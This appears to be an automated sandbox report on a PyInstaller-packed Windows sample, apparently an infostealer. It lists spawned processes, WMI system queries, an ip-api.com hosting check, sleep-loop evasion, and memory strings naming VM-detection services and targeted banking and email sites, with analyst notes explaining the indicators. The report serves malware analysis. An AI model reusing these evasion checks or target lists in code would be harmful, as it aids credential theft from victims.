              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (47 occurrences)
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (93 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
Source: C:\Windows\System32\getmac.exe | Process information set: NOOPENFILEERRORBOX
Note: NOOPENFILEERRORBOX is the SEM_NOOPENFILEERRORBOX flag passed to SetErrorMode; it suppresses the "file not found" dialog and is set routinely by .NET hosts and console tools, so by itself it is low-signal. What matters here is the set of processes the sample spawned (powershell.exe, tasklist.exe, systeminfo.exe, netsh.exe, csc.exe, getmac.exe), not the flag.

Malware Analysis System Evasion

Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (16 occurrences)
Note: 922337203685477 ms is (2^63 - 1) / 10000, the largest timeout a 100 ns tick count converts to, so these entries record an infinite (timeout -1) wait on a handle rather than a timed sleep. PowerShell runspaces and event waits produce such waits routinely; treat these entries as weak evasion evidence on their own and rely on the sleep loop counts below.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8636
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 762
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2060
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2608
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4492
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2503
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1737
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3103
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3457
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2802
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1189
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_ssl.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pyd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_decimal.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\select.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_queue.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_socket.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_hashlib.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_sqlite3.pyd
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\python312.dll
Note: _MEI33962 is a PyInstaller onefile extraction directory (_MEI followed by the bootloader's PID); python312.dll and the .pyd extension modules are the bundled Python 3.12 runtime, not separate payloads, which also explains the python-urllib3 User-Agent seen in the ip-api.com request. bexzy300.dll is the output of csc.exe compiling a source file under %TEMP%, the pattern produced by PowerShell Add-Type; it is loaded in-process by powershell.exe rather than started as its own executable, so "not been started" is expected.
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Check user administrative privileges: GetTokenInformation
Source: C:\Users\user\Desktop\X9g8L63QGs.exe | API coverage: 4.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 | Thread sleep count: 8220 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 | Thread sleep count: 1206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 | Thread sleep count: 8636 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 | Thread sleep count: 762 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208 | Thread sleep count: 7500 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 | Thread sleep count: 2060 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 | Thread sleep count: 2608 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404 | Thread sleep count: 271 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4240 | Thread sleep count: 4492 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2468 | Thread sleep count: 2503 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2500 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 | Thread sleep count: 2843 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 | Thread sleep count: 1737 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 | Thread sleep count: 3103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056 | Thread sleep count: 443 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 | Thread sleep count: 3457 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5932 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232 | Thread sleep count: 248 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 | Thread sleep count: 2802 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1552 | Thread sleep count: 1189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (26 occurrences)
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C26692F0 FindFirstFileExW,FindClose,4_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 4_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FF7C26692F0 FindFirstFileExW,FindClose,7_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7C26818E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe Code function: 97_2_00007FF7080B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,97_2_00007FF7080B46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe Code function: 97_2_00007FF7080AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,97_2_00007FF7080AE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe Code function: 97_2_00007FF7080F88E0 FindFirstFileExA,97_2_00007FF7080F88E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0C031230 GetSystemInfo,7_2_00007FFB0C031230
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\AppxSip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\en-GB\CRYPT32.dll.mui
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SYSTEM32\OpcServices.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\7488c4f196cfa60a4ca5cca24e2169b0\Microsoft.Management.Infrastructure.ni.dll
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvmwaretray
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc0
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: X9g8L63QGs.exe, 00000007.00000002.1693315105.000001E7C2586000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fecodevmware
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvboxservice
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: d2qemu-ga
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
              Source: getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport@
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Afecodevmsrvc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: fvmwareservice
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
